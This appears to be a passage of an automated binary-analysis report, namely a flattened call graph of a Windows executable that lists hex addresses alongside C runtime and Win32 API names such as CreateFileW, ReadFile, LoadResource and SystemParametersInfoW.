API calls 101974->101975 101986 3f0502 101975->101986 101976 3f0576 102008 3f05fe 101976->102008 101977 3f057d 102013 3e881d 58 API calls 2 library calls 101977->102013 101980 3f0584 101980->101976 102014 3e9e2b InitializeCriticalSectionAndSpinCount 101980->102014 101981 3f05f3 __setmbcp 101981->101962 101983 3e9c93 __mtinitlocknum 58 API calls 101983->101986 101985 3f05aa EnterCriticalSection 101985->101976 101986->101976 101986->101977 101986->101983 102011 3e6c50 59 API calls __lock 101986->102011 102012 3e6cba LeaveCriticalSection LeaveCriticalSection _doexit 101986->102012 101997 3f0627 __wopenfile 101988->101997 101989 3f0641 102019 3e8b28 58 API calls __getptd_noexit 101989->102019 101991 3f07fc 101991->101989 101994 3f085f 101991->101994 101992 3f0646 102020 3e8db6 9 API calls ___strgtold12_l 101992->102020 102016 3f85a1 101994->102016 101995 3e5310 102007 3e5332 LeaveCriticalSection LeaveCriticalSection _fprintf 101995->102007 101997->101989 101997->101991 101997->101997 102021 3e37cb 60 API calls 3 library calls 101997->102021 101999 3f07f5 101999->101991 102022 3e37cb 60 API calls 3 library calls 101999->102022 102001 3f0814 102001->101991 102023 3e37cb 60 API calls 3 library calls 102001->102023 102003->101959 102004->101972 102005->101972 102006->101972 102007->101972 102015 3e9d75 LeaveCriticalSection 102008->102015 102010 3f0605 102010->101981 102011->101986 102012->101986 102013->101980 102014->101985 102015->102010 102024 3f7d85 102016->102024 102018 3f85ba 102018->101995 102019->101992 102020->101995 102021->101999 102022->102001 102023->101991 102027 3f7d91 __setmbcp 102024->102027 102025 3f7da7 102109 3e8b28 58 API calls __getptd_noexit 102025->102109 102027->102025 102028 3f7ddd 102027->102028 102035 3f7e4e 102028->102035 102029 3f7dac 102110 3e8db6 9 API calls ___strgtold12_l 102029->102110 102032 3f7df9 102111 3f7e22 LeaveCriticalSection __unlock_fhandle 102032->102111 102034 3f7db6 __setmbcp 102034->102018 102036 3f7e6e 102035->102036 102037 3e44ea __wsopen_nolock 58 API calls 102036->102037 102041 3f7e8a 102037->102041 102038 3f7fc1 102039 3e8dc6 __invoke_watson 8 API calls 102038->102039 102040 3f85a0 102039->102040 102042 3f7d85 __wsopen_helper 103 API calls 102040->102042 102041->102038 102043 3f7ec4 102041->102043 102049 3f7ee7 102041->102049 102044 3f85ba 102042->102044 102045 3e8af4 __dosmaperr 58 API calls 102043->102045 102044->102032 102046 3f7ec9 102045->102046 102047 3e8b28 __setmbcp 58 API calls 102046->102047 102048 3f7ed6 102047->102048 102051 3e8db6 ___strgtold12_l 9 API calls 102048->102051 102050 3f7fa5 102049->102050 102058 3f7f83 102049->102058 102052 3e8af4 __dosmaperr 58 API calls 102050->102052 102053 3f7ee0 102051->102053 102054 3f7faa 102052->102054 102053->102032 102055 3e8b28 __setmbcp 58 API calls 102054->102055 102056 3f7fb7 102055->102056 102057 3e8db6 ___strgtold12_l 9 API calls 102056->102057 102057->102038 102059 3ed294 __alloc_osfhnd 61 API calls 102058->102059 102060 3f8051 102059->102060 102061 3f807e 102060->102061 102062 3f805b 102060->102062 102063 3f7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102061->102063 102064 3e8af4 __dosmaperr 58 API calls 102062->102064 102072 3f80a0 102063->102072 102065 3f8060 102064->102065 102067 3e8b28 __setmbcp 58 API calls 102065->102067 102066 3f811e GetFileType 102070 3f816b 102066->102070 102071 3f8129 GetLastError 102066->102071 102069 3f806a 102067->102069 102068 3f80ec GetLastError 102073 3e8b07 __dosmaperr 58 API calls 102068->102073 102074 3e8b28 __setmbcp 58 API calls 102069->102074 102081 3ed52a __set_osfhnd 59 API calls 102070->102081 102075 3e8b07 __dosmaperr 58 API calls 102071->102075 102072->102066 102072->102068 102077 3f7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102072->102077 102078 3f8111 102073->102078 102074->102053 102076 3f8150 CloseHandle 102075->102076 102076->102078 102079 3f815e 102076->102079 102080 3f80e1 102077->102080 102083 3e8b28 __setmbcp 58 API calls 102078->102083 102082 3e8b28 __setmbcp 58 API calls 102079->102082 102080->102066 102080->102068 102086 3f8189 102081->102086 102084 3f8163 102082->102084 102083->102038 102084->102078 102085 3f8344 102085->102038 102088 3f8517 CloseHandle 102085->102088 102086->102085 102087 3f18c1 __lseeki64_nolock 60 API calls 102086->102087 102104 3f820a 102086->102104 102089 3f81f3 102087->102089 102090 3f7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 102088->102090 102091 3e8af4 __dosmaperr 58 API calls 102089->102091 102089->102104 102093 3f853e 102090->102093 102091->102104 102092 3f0e5b 70 API calls __read_nolock 102092->102104 102094 3f8572 102093->102094 102095 3f8546 GetLastError 102093->102095 102094->102038 102096 3e8b07 __dosmaperr 58 API calls 102095->102096 102097 3f8552 102096->102097 102100 3ed43d __free_osfhnd 59 API calls 102097->102100 102098 3f0add __close_nolock 61 API calls 102098->102104 102099 3f823c 102101 3f97a2 __chsize_nolock 82 API calls 102099->102101 102099->102104 102100->102094 102101->102099 102102 3f18c1 60 API calls __lseeki64_nolock 102102->102104 102103 3ed886 __write 78 API calls 102103->102104 102104->102085 102104->102092 102104->102098 102104->102099 102104->102102 102104->102103 102105 3f83c1 102104->102105 102106 3f0add __close_nolock 61 API calls 102105->102106 102107 3f83c8 102106->102107 102108 3e8b28 __setmbcp 58 API calls 102107->102108 102108->102038 102109->102029 102110->102034 102111->102034 102113 3c4b83 102112->102113 102114 3c4c3f LoadLibraryA 102112->102114 102113->101914 102113->101917 102114->102113 102115 3c4c50 GetProcAddress 102114->102115 102115->102113 102117 3c4ea3 FindResourceExW 102116->102117 102121 3c4ec0 102116->102121 102118 3fd933 LoadResource 102117->102118 102117->102121 102119 3fd948 SizeofResource 102118->102119 102118->102121 102120 3fd95c LockResource 102119->102120 102119->102121 102120->102121 102121->101923 102123 3fd9ab 102122->102123 102124 3c4ef4 102122->102124 102128 3e584d 102124->102128 102126 3c4f02 102126->101929 102127->101923 102129 3e5859 __setmbcp 102128->102129 102130 3e586b 102129->102130 102131 3e5891 102129->102131 102141 3e8b28 58 API calls __getptd_noexit 102130->102141 102143 3e6c11 102131->102143 102133 3e5870 102142 3e8db6 9 API calls ___strgtold12_l 102133->102142 102138 3e587b __setmbcp 102138->102126 102139 3e58a6 102150 3e58c8 LeaveCriticalSection LeaveCriticalSection _fprintf 102139->102150 102141->102133 102142->102138 102144 3e6c43 EnterCriticalSection 102143->102144 102145 3e6c21 102143->102145 102147 3e5897 102144->102147 102145->102144 102146 3e6c29 102145->102146 102148 3e9c0b __lock 58 API calls 102146->102148 102149 3e57be 83 API calls 5 library calls 102147->102149 102148->102147 102149->102139 102150->102138 102154 3e55fd 102151->102154 102153 3c4f2e 102153->101942 102155 3e5609 __setmbcp 102154->102155 102156 3e561f _memset 102155->102156 102157 3e564c 102155->102157 102158 3e5644 __setmbcp 102155->102158 102181 3e8b28 58 API calls __getptd_noexit 102156->102181 102159 3e6c11 __lock_file 59 API calls 102157->102159 102158->102153 102161 3e5652 102159->102161 102167 3e541d 102161->102167 102162 3e5639 102182 3e8db6 9 API calls ___strgtold12_l 102162->102182 102169 3e5438 _memset 102167->102169 102173 3e5453 102167->102173 102168 3e5443 102279 3e8b28 58 API calls __getptd_noexit 102168->102279 102169->102168 102169->102173 102178 3e5493 102169->102178 102171 3e5448 102280 3e8db6 9 API calls ___strgtold12_l 102171->102280 102183 3e5686 LeaveCriticalSection LeaveCriticalSection _fprintf 102173->102183 102175 3e55a4 _memset 102282 3e8b28 58 API calls __getptd_noexit 102175->102282 102178->102173 102178->102175 102184 3e46e6 102178->102184 102191 3f0e5b 102178->102191 102259 3f0ba7 102178->102259 102281 3f0cc8 58 API calls 4 library calls 102178->102281 102181->102162 102182->102158 102183->102158 102185 3e4705 102184->102185 102186 3e46f0 102184->102186 102185->102178 102283 3e8b28 58 API calls __getptd_noexit 102186->102283 102188 3e46f5 102284 3e8db6 9 API calls ___strgtold12_l 102188->102284 102190 3e4700 102190->102178 102192 3f0e7c 102191->102192 102193 3f0e93 102191->102193 102294 3e8af4 58 API calls __getptd_noexit 102192->102294 102194 3f15cb 102193->102194 102199 3f0ecd 102193->102199 102310 3e8af4 58 API calls __getptd_noexit 102194->102310 102197 3f0e81 102295 3e8b28 58 API calls __getptd_noexit 102197->102295 102201 3f0ed5 102199->102201 102207 3f0eec 102199->102207 102200 3f15d0 102311 3e8b28 58 API calls __getptd_noexit 102200->102311 102296 3e8af4 58 API calls __getptd_noexit 102201->102296 102204 3f0ee1 102312 3e8db6 9 API calls ___strgtold12_l 102204->102312 102205 3f0eda 102297 3e8b28 58 API calls __getptd_noexit 102205->102297 102208 3f0f01 102207->102208 102210 3f0f1b 102207->102210 102212 3f0f39 102207->102212 102239 3f0e88 102207->102239 102298 3e8af4 58 API calls __getptd_noexit 102208->102298 102210->102208 102215 3f0f26 102210->102215 102299 3e881d 58 API calls 2 library calls 102212->102299 102285 3f5c6b 102215->102285 102216 3f0f49 102218 3f0f6c 102216->102218 102219 3f0f51 102216->102219 102217 3f103a 102220 3f10b3 ReadFile 102217->102220 102223 3f1050 GetConsoleMode 102217->102223 102302 3f18c1 60 API calls 3 library calls 102218->102302 102300 3e8b28 58 API calls __getptd_noexit 102219->102300 102224 3f10d5 102220->102224 102225 3f1593 GetLastError 102220->102225 102230 3f1064 102223->102230 102231 3f10b0 102223->102231 102224->102225 102232 3f10a5 102224->102232 102227 3f1093 102225->102227 102228 3f15a0 102225->102228 102226 3f0f56 102301 3e8af4 58 API calls __getptd_noexit 102226->102301 102241 3f1099 102227->102241 102303 3e8b07 58 API calls 2 library calls 102227->102303 102308 3e8b28 58 API calls __getptd_noexit 102228->102308 102230->102231 102234 3f106a ReadConsoleW 102230->102234 102231->102220 102232->102241 102243 3f110a 102232->102243 102246 3f1377 102232->102246 102234->102232 102236 3f108d GetLastError 102234->102236 102235 3f15a5 102309 3e8af4 58 API calls __getptd_noexit 102235->102309 102236->102227 102239->102178 102240 3e2d55 _free 58 API calls 102240->102239 102241->102239 102241->102240 102244 3f1176 ReadFile 102243->102244 102252 3f11f7 102243->102252 102247 3f1197 GetLastError 102244->102247 102249 3f11a1 102244->102249 102245 3f147d ReadFile 102251 3f14a0 GetLastError 102245->102251 102258 3f14ae 102245->102258 102246->102241 102246->102245 102247->102249 102248 3f12a4 102305 3e8b28 58 API calls __getptd_noexit 102248->102305 102249->102243 102304 3f18c1 60 API calls 3 library calls 102249->102304 102251->102258 102252->102241 102252->102248 102253 3f12b4 102252->102253 102256 3f1264 MultiByteToWideChar 102252->102256 102253->102256 102306 3f18c1 60 API calls 3 library calls 102253->102306 102256->102236 102256->102241 102258->102246 102307 3f18c1 60 API calls 3 library calls 102258->102307 102260 3f0bb2 102259->102260 102264 3f0bc7 102259->102264 102346 3e8b28 58 API calls __getptd_noexit 102260->102346 102262 3f0bb7 102347 3e8db6 9 API calls ___strgtold12_l 102262->102347 102263 3f0bc2 102263->102178 102264->102263 102266 3f0bfc 102264->102266 102348 3f5fe4 58 API calls __malloc_crt 102264->102348 102268 3e46e6 __fclose_nolock 58 API calls 102266->102268 102269 3f0c10 102268->102269 102313 3f0d47 102269->102313 102271 3f0c17 102271->102263 102272 3e46e6 __fclose_nolock 58 API calls 102271->102272 102273 3f0c3a 102272->102273 102273->102263 102274 3e46e6 __fclose_nolock 58 API calls 102273->102274 102275 3f0c46 102274->102275 102275->102263 102276 3e46e6 __fclose_nolock 58 API calls 102275->102276 102277 3f0c53 102276->102277 102278 3e46e6 __fclose_nolock 58 API calls 102277->102278 102278->102263 102279->102171 102280->102173 102281->102178 102282->102171 102283->102188 102284->102190 102286 3f5c76 102285->102286 102287 3f5c83 102285->102287 102288 3e8b28 __setmbcp 58 API calls 102286->102288 102289 3e8b28 __setmbcp 58 API calls 102287->102289 102291 3f5c8f 102287->102291 102290 3f5c7b 102288->102290 102292 3f5cb0 102289->102292 102290->102217 102291->102217 102293 3e8db6 ___strgtold12_l 9 API calls 102292->102293 102293->102290 102294->102197 102295->102239 102296->102205 102297->102204 102298->102205 102299->102216 102300->102226 102301->102239 102302->102215 102303->102241 102304->102249 102305->102241 102306->102256 102307->102258 102308->102235 102309->102241 102310->102200 102311->102204 102312->102239 102314 3f0d53 __setmbcp 102313->102314 102315 3f0d77 102314->102315 102316 3f0d60 102314->102316 102318 3f0e3b 102315->102318 102319 3f0d8b 102315->102319 102317 3e8af4 __dosmaperr 58 API calls 102316->102317 102321 3f0d65 102317->102321 102320 3e8af4 __dosmaperr 58 API calls 102318->102320 102322 3f0da9 102319->102322 102323 3f0db6 102319->102323 102324 3f0dae 102320->102324 102325 3e8b28 __setmbcp 58 API calls 102321->102325 102326 3e8af4 __dosmaperr 58 API calls 102322->102326 102327 3f0dd8 102323->102327 102328 3f0dc3 102323->102328 102331 3e8b28 __setmbcp 58 API calls 102324->102331 102335 3f0d6c __setmbcp 102325->102335 102326->102324 102330 3ed206 ___lock_fhandle 59 API calls 102327->102330 102329 3e8af4 __dosmaperr 58 API calls 102328->102329 102332 3f0dc8 102329->102332 102333 3f0dde 102330->102333 102334 3f0dd0 102331->102334 102336 3e8b28 __setmbcp 58 API calls 102332->102336 102337 3f0e04 102333->102337 102338 3f0df1 102333->102338 102341 3e8db6 ___strgtold12_l 9 API calls 102334->102341 102335->102271 102336->102334 102339 3e8b28 __setmbcp 58 API calls 102337->102339 102340 3f0e5b __read_nolock 70 API calls 102338->102340 102342 3f0e09 102339->102342 102343 3f0dfd 102340->102343 102341->102335 102344 3e8af4 __dosmaperr 58 API calls 102342->102344 102345 3f0e33 __read LeaveCriticalSection 102343->102345 102344->102343 102345->102335 102346->102262 102347->102263 102348->102266 102352 3e520a GetSystemTimeAsFileTime 102349->102352 102351 428f6e 102351->101944 102353 3e5238 __aulldiv 102352->102353 102353->102351 102355 3e5c6c __setmbcp 102354->102355 102356 3e5c7e 102355->102356 102357 3e5c93 102355->102357 102368 3e8b28 58 API calls __getptd_noexit 102356->102368 102359 3e6c11 __lock_file 59 API calls 102357->102359 102361 3e5c99 102359->102361 102360 3e5c83 102369 3e8db6 9 API calls ___strgtold12_l 102360->102369 102370 3e58d0 67 API calls 6 library calls 102361->102370 102364 3e5ca4 102371 3e5cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 102364->102371 102366 3e5cb6 102367 3e5c8e __setmbcp 102366->102367 102367->101949 102368->102360 102369->102367 102370->102364 102371->102366 102372->101828 102373->101830 102374->101880 102376 3e486f __setmbcp 102375->102376 102377 3e489d __setmbcp 102376->102377 102378 3e488d 102376->102378 102379 3e48a5 102376->102379 102377->101892 102455 3e8b28 58 API calls __getptd_noexit 102378->102455 102380 3e6c11 __lock_file 59 API calls 102379->102380 102382 3e48ab 102380->102382 102443 3e470a 102382->102443 102383 3e4892 102456 3e8db6 9 API calls ___strgtold12_l 102383->102456 102389 3e53b2 __setmbcp 102388->102389 102390 3e53de 102389->102390 102391 3e53c6 102389->102391 102393 3e6c11 __lock_file 59 API calls 102390->102393 102398 3e53d6 __setmbcp 102390->102398 102617 3e8b28 58 API calls __getptd_noexit 102391->102617 102395 3e53f0 102393->102395 102394 3e53cb 102618 3e8db6 9 API calls ___strgtold12_l 102394->102618 102601 3e533a 102395->102601 102398->101884 102402 4298c8 SetFileTime CloseHandle 102401->102402 102403 4298de 102401->102403 102402->102403 102403->101862 102407 429748 __tzset_nolock _wcscmp 102404->102407 102405 429109 GetSystemTimeAsFileTime 102405->102407 102406 429210 102406->101862 102410 3e40fb 58 API calls __wsplitpath_helper 102406->102410 102407->102405 102407->102406 102408 3c4f0b 74 API calls 102407->102408 102409 3c4ee5 85 API calls 102407->102409 102408->102407 102409->102407 102410->101860 102411->101858 102413 428b11 102412->102413 102415 428b1f 102412->102415 102414 3e525b 115 API calls 102413->102414 102414->102415 102416 428b64 102415->102416 102417 3e525b 115 API calls 102415->102417 102439 428b28 102415->102439 102695 428d91 102416->102695 102419 428b49 102417->102419 102419->102416 102439->101890 102439->101897 102445 3e4719 102443->102445 102450 3e4737 102443->102450 102444 3e4727 102486 3e8b28 58 API calls __getptd_noexit 102444->102486 102445->102444 102445->102450 102453 3e4751 _memmove 102445->102453 102447 3e472c 102487 3e8db6 9 API calls ___strgtold12_l 102447->102487 102457 3e48dd LeaveCriticalSection LeaveCriticalSection _fprintf 102450->102457 102452 3e46e6 __fclose_nolock 58 API calls 102452->102453 102453->102450 102453->102452 102458 3ed886 102453->102458 102488 3e4a3d 102453->102488 102494 3eae1e 78 API calls 6 library calls 102453->102494 102455->102383 102456->102377 102457->102377 102459 3ed892 __setmbcp 102458->102459 102460 3ed89f 102459->102460 102461 3ed8b6 102459->102461 102466 3ed8ca 102461->102466 102486->102447 102487->102450 102489 3e4a74 102488->102489 102490 3e4a50 102488->102490 102489->102453 102490->102489 102491 3e46e6 __fclose_nolock 58 API calls 102490->102491 102492 3e4a6d 102491->102492 102494->102453 102602 3e5349 102601->102602 102605 3e535d 102601->102605 102650 3e8b28 58 API calls __getptd_noexit 102602->102650 102604 3e5359 102619 3e5415 LeaveCriticalSection LeaveCriticalSection _fprintf 102604->102619 102605->102604 102607 3e4a3d __flush 78 API calls 102605->102607 102606 3e534e 102651 3e8db6 9 API calls ___strgtold12_l 102606->102651 102609 3e5369 102607->102609 102620 3f0b77 102609->102620 102617->102394 102618->102398 102619->102398 102650->102606 102651->102604 102738 4160e8 102737->102738 102739 4160cb 102737->102739 102738->101181 102739->102738 102741 4160ab 59 API calls Mailbox 102739->102741 102741->102739 102742->101191 102743 3c552a 102744 3c5ab8 59 API calls 102743->102744 102745 3c553c 102744->102745 102746 3c54d2 61 API calls 102745->102746 102747 3c554a 102746->102747 102749 3c555a Mailbox 102747->102749 102750 3c8061 61 API calls Mailbox 102747->102750 102750->102749 102751 3ce5ab 102754 3cd100 102751->102754 102753 3ce5b9 102755 3cd11d 102754->102755 102756 3cd37d 102754->102756 102757 4026e0 102755->102757 102758 402691 102755->102758 102776 3cd144 102755->102776 102767 3cd54b 102756->102767 102817 429e4a 89 API calls 4 library calls 102756->102817 102812 43a3e6 341 API calls __cinit 102757->102812 102759 402694 102758->102759 102768 4026af 102758->102768 102762 4026a0 102759->102762 102759->102776 102810 43a9fa 341 API calls 102762->102810 102765 3e2d40 __cinit 67 API calls 102765->102776 102766 4028b5 102766->102766 102767->102753 102768->102756 102811 43aea2 341 API calls 3 library calls 102768->102811 102769 3cd434 102805 3c8a52 68 API calls 102769->102805 102773 3cd443 102773->102753 102774 4027fc 102816 43a751 89 API calls 102774->102816 102776->102756 102776->102765 102776->102767 102776->102769 102776->102774 102785 3c9ea0 341 API calls 102776->102785 102786 3c8047 59 API calls 102776->102786 102788 3c9dda 102776->102788 102793 3c8740 102776->102793 102800 3c8542 68 API calls 102776->102800 102801 3c84c0 102776->102801 102806 3c843a 68 API calls 102776->102806 102807 3ccf7c 341 API calls 102776->102807 102808 3ccf00 89 API calls 102776->102808 102809 3ccd7d 341 API calls 102776->102809 102813 3c8a52 68 API calls 102776->102813 102814 3c9d3c 60 API calls Mailbox 102776->102814 102815 41678d 60 API calls 102776->102815 102785->102776 102786->102776 102789 3e0db6 Mailbox 59 API calls 102788->102789 102790 3c9de7 102789->102790 102791 3c9df6 102790->102791 102792 3c7de1 59 API calls 102790->102792 102791->102776 102792->102791 102794 3c8921 102793->102794 102795 3c8753 102793->102795 102794->102776 102796 3c7667 59 API calls 102795->102796 102798 3c8764 102795->102798 102797 3c8983 102796->102797 102799 3e2d40 __cinit 67 API calls 102797->102799 102798->102776 102799->102798 102800->102776 102802 3c84cb 102801->102802 102804 3c84f2 102802->102804 102818 3c89b3 102802->102818 102804->102776 102805->102773 102806->102776 102807->102776 102808->102776 102809->102776 102810->102767 102811->102756 102812->102776 102813->102776 102814->102776 102815->102776 102816->102756 102817->102766 102819 3c8740 68 API calls 102818->102819 102820 3c89c3 102819->102820 102821 3c8a3d 102820->102821 102822 3c89cd 102820->102822 102836 3c9d3c 60 API calls Mailbox 102821->102836 102823 3e0db6 Mailbox 59 API calls 102822->102823 102825 3c89de 102823->102825 102826 3c89ec 102825->102826 102827 3c7667 59 API calls 102825->102827 102828 3c89fb 102826->102828 102834 3c7f77 59 API calls 2 library calls 102826->102834 102827->102826 102830 3e0db6 Mailbox 59 API calls 102828->102830 102831 3c8a05 102830->102831 102835 3c8660 68 API calls 102831->102835 102833 3c8a2d 102833->102804 102834->102828 102835->102833 102836->102833 102837 3e7c56 102838 3e7c62 __setmbcp 102837->102838 102874 3e9e08 GetStartupInfoW 102838->102874 102840 3e7c67 102876 3e8b7c GetProcessHeap 102840->102876 102842 3e7cbf 102843 3e7cca 102842->102843 102959 3e7da6 58 API calls 3 library calls 102842->102959 102877 3e9ae6 102843->102877 102846 3e7cd0 102847 3e7cdb __RTC_Initialize 102846->102847 102960 3e7da6 58 API calls 3 library calls 102846->102960 102898 3ed5d2 102847->102898 102850 3e7cea 102851 3e7cf6 GetCommandLineW 102850->102851 102961 3e7da6 58 API calls 3 library calls 102850->102961 102917 3f4f23 GetEnvironmentStringsW 102851->102917 102855 3e7cf5 102855->102851 102857 3e7d10 102858 3e7d1b 102857->102858 102962 3e30b5 58 API calls 3 library calls 102857->102962 102927 3f4d58 102858->102927 102861 3e7d21 102862 3e7d2c 102861->102862 102963 3e30b5 58 API calls 3 library calls 102861->102963 102941 3e30ef 102862->102941 102865 3e7d34 102866 3e7d3f __wwincmdln 102865->102866 102964 3e30b5 58 API calls 3 library calls 102865->102964 102947 3c47d0 102866->102947 102869 3e7d53 102870 3e7d62 102869->102870 102965 3e3358 58 API calls _doexit 102869->102965 102966 3e30e0 58 API calls _doexit 102870->102966 102873 3e7d67 __setmbcp 102875 3e9e1e 102874->102875 102875->102840 102876->102842 102967 3e3187 RtlEncodePointer 102877->102967 102879 3e9aeb 102973 3e9d3c InitializeCriticalSectionAndSpinCount __mtinitlocks 102879->102973 102881 3e9af0 102882 3e9af4 102881->102882 102975 3e9d8a TlsAlloc 102881->102975 102974 3e9b5c 61 API calls 2 library calls 102882->102974 102885 3e9af9 102885->102846 102886 3e9b06 102886->102882 102887 3e9b11 102886->102887 102976 3e87d5 102887->102976 102889 3e9b1e 102890 3e9b53 102889->102890 102982 3e9de6 TlsSetValue 102889->102982 102984 3e9b5c 61 API calls 2 library calls 102890->102984 102893 3e9b32 102893->102890 102895 3e9b38 102893->102895 102894 3e9b58 102894->102846 102983 3e9a33 58 API calls 4 library calls 102895->102983 102897 3e9b40 GetCurrentThreadId 102897->102846 102899 3ed5de __setmbcp 102898->102899 102900 3e9c0b __lock 58 API calls 102899->102900 102901 3ed5e5 102900->102901 102902 3e87d5 __calloc_crt 58 API calls 102901->102902 102903 3ed5f6 102902->102903 102904 3ed661 GetStartupInfoW 102903->102904 102905 3ed601 @_EH4_CallFilterFunc@8 __setmbcp 102903->102905 102911 3ed676 102904->102911 102914 3ed7a5 102904->102914 102905->102850 102906 3ed86d 103000 3ed87d LeaveCriticalSection _doexit 102906->103000 102908 3e87d5 __calloc_crt 58 API calls 102908->102911 102909 3ed7f2 GetStdHandle 102909->102914 102910 3ed805 GetFileType 102910->102914 102911->102908 102913 3ed6c4 102911->102913 102911->102914 102912 3ed6f8 GetFileType 102912->102913 102913->102912 102913->102914 102998 3e9e2b InitializeCriticalSectionAndSpinCount 102913->102998 102914->102906 102914->102909 102914->102910 102999 3e9e2b InitializeCriticalSectionAndSpinCount 102914->102999 102918 3e7d06 102917->102918 102919 3f4f34 102917->102919 102923 3f4b1b GetModuleFileNameW 102918->102923 103001 3e881d 58 API calls 2 library calls 102919->103001 102921 3f4f5a _memmove 102922 3f4f70 FreeEnvironmentStringsW 102921->102922 102922->102918 102924 3f4b4f _wparse_cmdline 102923->102924 102926 3f4b8f _wparse_cmdline 102924->102926 103002 3e881d 58 API calls 2 library calls 102924->103002 102926->102857 102928 3f4d71 __wsetenvp 102927->102928 102932 3f4d69 102927->102932 102929 3e87d5 __calloc_crt 58 API calls 102928->102929 102930 3f4d9a __wsetenvp 102929->102930 102930->102932 102933 3f4df1 102930->102933 102934 3e87d5 __calloc_crt 58 API calls 102930->102934 102935 3f4e16 102930->102935 102938 3f4e2d 102930->102938 103003 3f4607 58 API calls 2 library calls 102930->103003 102931 3e2d55 _free 58 API calls 102931->102932 102932->102861 102933->102931 102934->102930 102936 3e2d55 _free 58 API calls 102935->102936 102936->102932 103004 3e8dc6 IsProcessorFeaturePresent 102938->103004 102940 3f4e39 102940->102861 102943 3e30fb __IsNonwritableInCurrentImage 102941->102943 103019 3ea4d1 102943->103019 102944 3e3119 __initterm_e 102945 3e2d40 __cinit 67 API calls 102944->102945 102946 3e3138 _doexit __IsNonwritableInCurrentImage 102944->102946 102945->102946 102946->102865 102948 3c47ea 102947->102948 102958 3c4889 102947->102958 102949 3c4824 IsThemeActive 102948->102949 103022 3e336c 102949->103022 102953 3c4850 103034 3c48fd SystemParametersInfoW SystemParametersInfoW 102953->103034 102955 3c485c 103035 3c3b3a 102955->103035 102957 3c4864 SystemParametersInfoW 102957->102958 102958->102869 102959->102843 102960->102847 102961->102855 102965->102870 102966->102873 102985 3e33c7 102967->102985 102969 3e3198 __init_pointers __initp_misc_winsig 102986 3ea524 EncodePointer 102969->102986 102971 3e31b0 __init_pointers 102972 3e9e99 34 API calls 102971->102972 102972->102879 102973->102881 102974->102885 102975->102886 102979 3e87dc 102976->102979 102978 3e8817 102978->102889 102979->102978 102981 3e87fa 102979->102981 102987 3f51f6 102979->102987 102981->102978 102981->102979 102995 3ea132 Sleep 102981->102995 102982->102893 102983->102897 102984->102894 102985->102969 102986->102971 102988 3f5201 102987->102988 102994 3f521c 102987->102994 102989 3f520d 102988->102989 102988->102994 102996 3e8b28 58 API calls __getptd_noexit 102989->102996 102991 3f522c RtlAllocateHeap 102992 3f5212 102991->102992 102991->102994 102992->102979 102994->102991 102994->102992 102997 3e33a1 DecodePointer 102994->102997 102995->102981 102996->102992 102997->102994 102998->102913 102999->102914 103000->102905 103001->102921 103002->102926 103003->102930 103005 3e8dd1 103004->103005 103010 3e8c59 103005->103010 103009 3e8dec 103009->102940 103011 3e8c73 _memset __call_reportfault 103010->103011 103012 3e8c93 IsDebuggerPresent 103011->103012 103018 3ea155 SetUnhandledExceptionFilter UnhandledExceptionFilter 103012->103018 103014 3ec5f6 ___strgtold12_l 6 API calls 103015 3e8d7a 103014->103015 103017 3ea140 GetCurrentProcess TerminateProcess 103015->103017 103016 3e8d57 __call_reportfault 103016->103014 103017->103009 103018->103016 103020 3ea4d4 EncodePointer 103019->103020 103020->103020 103021 3ea4ee 103020->103021 103021->102944 103023 3e9c0b __lock 58 API calls 103022->103023 103024 3e3377 DecodePointer EncodePointer 103023->103024 103087 3e9d75 LeaveCriticalSection 103024->103087 103026 3c4849 103027 3e33d4 103026->103027 103028 3e33f8 103027->103028 103029 3e33de 103027->103029 103028->102953 103029->103028 103088 3e8b28 58 API calls __getptd_noexit 103029->103088 103031 3e33e8 103089 3e8db6 9 API calls ___strgtold12_l 103031->103089 103033 3e33f3 103033->102953 103034->102955 103036 3c3b47 __ftell_nolock 103035->103036 103037 3c7667 59 API calls 103036->103037 103038 3c3b51 GetCurrentDirectoryW 103037->103038 103090 3c3766 103038->103090 103040 3c3b7a IsDebuggerPresent 103041 3c3b88 103040->103041 103042 3fd272 MessageBoxA 103040->103042 103043 3c3c61 103041->103043 103045 3fd28c 103041->103045 103046 3c3ba5 103041->103046 103042->103045 103044 3c3c68 SetCurrentDirectoryW 103043->103044 103047 3c3c75 Mailbox 103044->103047 103300 3c7213 59 API calls Mailbox 103045->103300 103171 3c7285 103046->103171 103047->102957 103050 3fd29c 103055 3fd2b2 SetCurrentDirectoryW 103050->103055 103055->103047 103087->103026 103088->103031 103089->103033 103091 3c7667 59 API calls 103090->103091 103092 3c377c 103091->103092 103302 3c3d31 103092->103302 103094 3c379a 103095 3c4706 61 API calls 103094->103095 103096 3c37ae 103095->103096 103097 3c7de1 59 API calls 103096->103097 103098 3c37bb 103097->103098 103099 3c4ddd 136 API calls 103098->103099 103100 3c37d4 103099->103100 103101 3c37dc Mailbox 103100->103101 103102 3fd173 103100->103102 103106 3c8047 59 API calls 103101->103106 103344 42955b 103102->103344 103105 3fd192 103108 3e2d55 _free 58 API calls 103105->103108 103109 3c37ef 103106->103109 103107 3c4e4a 84 API calls 103107->103105 103110 3fd19f 103108->103110 103316 3c928a 103109->103316 103112 3c4e4a 84 API calls 103110->103112 103114 3fd1a8 103112->103114 103118 3c3ed0 59 API calls 103114->103118 103115 3c7de1 59 API calls 103116 3c3808 103115->103116 103117 3c84c0 69 API calls 103116->103117 103119 3c381a Mailbox 103117->103119 103120 3fd1c3 103118->103120 103121 3c7de1 59 API calls 103119->103121 103122 3c3ed0 59 API calls 103120->103122 103123 3c3840 103121->103123 103124 3fd1df 103122->103124 103125 3c84c0 69 API calls 103123->103125 103126 3c4706 61 API calls 103124->103126 103128 3c384f Mailbox 103125->103128 103127 3fd204 103126->103127 103129 3c3ed0 59 API calls 103127->103129 103131 3c7667 59 API calls 103128->103131 103130 3fd210 103129->103130 103132 3c8047 59 API calls 103130->103132 103133 3c386d 103131->103133 103134 3fd21e 103132->103134 103319 3c3ed0 103133->103319 103137 3c3ed0 59 API calls 103134->103137 103138 3fd22d 103137->103138 103144 3c8047 59 API calls 103138->103144 103140 3c3887 103140->103114 103141 3c3891 103140->103141 103142 3e2efd _W_store_winword 60 API calls 103141->103142 103143 3c389c 103142->103143 103143->103120 103145 3c38a6 103143->103145 103146 3fd24f 103144->103146 103147 3e2efd _W_store_winword 60 API calls 103145->103147 103148 3c3ed0 59 API calls 103146->103148 103149 3c38b1 103147->103149 103150 3fd25c 